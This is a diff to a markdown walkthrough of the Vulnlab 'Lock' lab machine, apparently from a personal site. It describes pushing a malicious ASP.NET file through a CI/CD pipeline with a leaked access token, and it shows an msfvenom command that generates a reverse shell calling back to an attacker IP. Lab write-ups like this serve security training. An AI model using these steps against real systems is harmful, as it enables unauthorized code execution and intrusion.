UjoQurius/ujoqurius.github.io/vulnlab/machines/lock/index.md

 CI/CD integration is now active - changes to the repository will automatically be deployed to the webserve
 ```

 This is interesting.
-This would mean that if we add a file to this repository, create commit and push with the access token we found earlier, we could upload a reverse shell.
+This would mean that if we add a file to this repository, create commit and push with the access token we found earlier, we could upload a web shell.
 That's exactly what we are going to do.

 ### Pushing reverse shell to the web server

-As you may recall thinking back to the reconnaissance phase, we discovered that the web site is running on `ASP.NET`.
+As you may recall from the reconnaissance phase, we discovered that the web site is running on `ASP.NET`.
 That means that we can create a malicious `.aspx` file and get code execution that way.
-We can generate such reverse shell with `msfvenom`.
+We can generate such reverse shell file with `msfvenom`.

 ```
 ➜  website git:(main) ✗ msfvenom --platform windows --arch x64 -p windows/x64/shell_reverse_tcp LHOST=10.8.0.109 LPORT=443 -f aspx -o shell.aspx